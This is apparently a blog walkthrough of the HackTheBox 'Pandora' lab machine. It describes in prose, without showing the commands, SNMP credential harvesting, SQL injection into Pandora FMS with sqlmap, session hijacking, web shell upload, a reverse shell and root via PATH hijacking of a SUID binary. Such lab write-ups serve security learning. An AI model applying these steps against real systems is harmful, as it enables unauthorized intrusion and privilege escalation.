top of page
Image by Blake Cheek
  • Writer's pictureBeri Contraster

Pandora - HackTheBox Walkthrough



Linux - Easy

 Released on 08 Jan 2022


Welcome Reader, Today we'll hack Pandora from HackTheBox. It's an easy-difficulty Linux machine. Let's start with an Nmap scan.


Nmap Scan


This machine has only two ports open SSH and HTTP with Apache running on it. Let's see what we have on port 80.



Looks like they are providing network monitoring services. We also discovered a domain panda.htb let's add it to /etc/hosts.



I didn't find anything interesting on the website. I also tried directory fuzzing with gobuster but nothing. I also tried VHost fuzzing using FFUF but no luck. This made me step back a little because I knew I was missing something. Let's do a Nmap scan of UDP ports.


Nmap Scan


Ah an open SNMP port. Let's use Snpwalk to fetch more information.


SNMP - Simple Network Management Protocol. It provides a framework for fetching performance and device configuration. SNMP is used to manage and monitor all the devices connected over a network. It exposes management data in the form of variables on the managed systems. All of these variables can then be remotely queried.

We can also use Snmpbulkwalk which is much faster than Snmpwalk. Watch Ippsec's video to understand better.



Crawling through the output I found cleartext credentials of user Daniel. Let's try logging in with SSH.


Lateral Movement


The user flag is in Matt's home directory and to read it we have to be Matt. Time for lateral movement. Let's start with some manual enumeration before moving on to automated scripts.



I found another directory other than HTML and it looks like there is another site running on the machine. Let's take a look at sites-enabled.



There's a Pandora configuration file that reveals that this site is only accessible from Localhost.


Local Port Forwarding

Let's do local port forwarding using ssh.



Going over to the local host on port 800, we'll be presented with Pandora FMS.



There is also a version number written on the bottom of the website. A quick look at the current exploits of this version led me to this SQL injection vulnerability.


SQL Injection

The SQL Injection vulnerability lies in /include/chart_generator.php. After looking at the vulnerable code, it appears that we can exploit the SQL injection vulnerability by passing the session_id parameter. Let's use Sqlmap to exploit this vulnerability.



Sqlmap successfully exploited using "boolean-based blind" SQL Injection. We can now use Sqlmap to fetch more data. Let's list the current databases first.



Let's dump the Pandora database tables.



Out of all the tables, the tsessions_php caught my attention let's dump this one.



Sqlmap retrieved the session ID of user Matt. We can use that to login into Pandora.



I changed the session ID value using the Cookie Editor extension you can do the same by using the inspecting tool on any browser. I replaced the previous ID with Matt's session ID and refreshed the site to log in as Matt.


But Matt does not have admin privileges which still can get us a reverse shell but I found another trick. After logging in as Matt I did some manual SQL Injection to obtain admin privileges.



Use this after logging in as Matt and refresh your site and you should now have admin privileges.



Now we can upload files. Let's upload a PHP shell.



I upload this PHP shell and we can access it under /images.



Now let's get a reverse shell using this bash command. Don't forget to URL encode this before using it.




Privilege Escalation

I was looking for files with SUID permissions and found an interesting file.



Let's move the pandora_backup file to our attacking machine so that we can use strings to take an inside look at the binary.



It is compressing the data using tar but it's using relative path instead of absolute path which can be abused to execute malicious scripts with root privileges. This is called Path Variable Hijacking.


The PATH environment variable lists directories. When a binary is run without specifying its absolute path, directories in PATH are searched in order. The vulnerability arises if our file, mimicking the binary's name, is placed earlier in PATH. Then, instead of the intended binary, our malicious command in the mimicked file gets executed.

I created a malicious file "tar" under /tmp with the same bash shell we used earlier.



Let's add /tmp to the PATH variable.



Now let's execute the binary.



The error indicates permission problems accessing a file in the root directory. However, the binary has the SUID bit set, granting it root privileges. This appears to be a restricted shell scenario.


We can the following command from GTFOBins to break out of the restricted shell.



Let's try executing the binary now.



I successfully received a reverse shell as root.


Thanks for reading. If you have any questions please don't hesitate to ask me.

12 views0 comments

Recent Posts

See All

Comentários


bottom of page